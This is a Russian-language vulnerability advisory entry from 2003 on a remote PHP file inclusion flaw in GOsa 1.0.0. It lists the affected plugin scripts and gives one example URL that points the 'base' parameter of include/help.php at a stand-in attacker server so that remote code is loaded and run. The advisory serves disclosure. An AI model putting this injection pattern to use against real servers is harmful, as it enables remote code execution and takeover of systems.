| Дата публикации: | 28.02.2003 |
| Дата изменения: | 17.10.2006 |
| Всего просмотров: | 1110 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость обнаружена в GONICUS System Administrator (GOsa). Удаленный пользователь может внедрить и выполнить произвольный PHP код на системе, включая команды операционной системы. Несколько сценариев в программе позволяют удаленному пользователю изменять переменные, чтобы выполнить произвольный код. Удаленный пользователь может установить переменную 'plugin' в следующих файлах, указывающую на удаленно расположенный PHP файл, который будет выполнен на целевом сервере: plugins/3fax/1blocklists/index.php plugins/2administration/6departamentadmin/index.php plugins/2administration/5terminals/index.php plugins/2administration/ 4mailinglists/index.php plugins/2administration/3departaments/index.php plugins/2administration/2groupd/index.phpПодобная уязвимость существует в 'base' переменной в 'include/help.php' сценарии. Пример: http://target.server/include/help.php?base=http://attackers.server/Уязвимость обнаружена в GONICUS 1.0.0 |
| Ссылки: | GOnicus System Administrator php injection |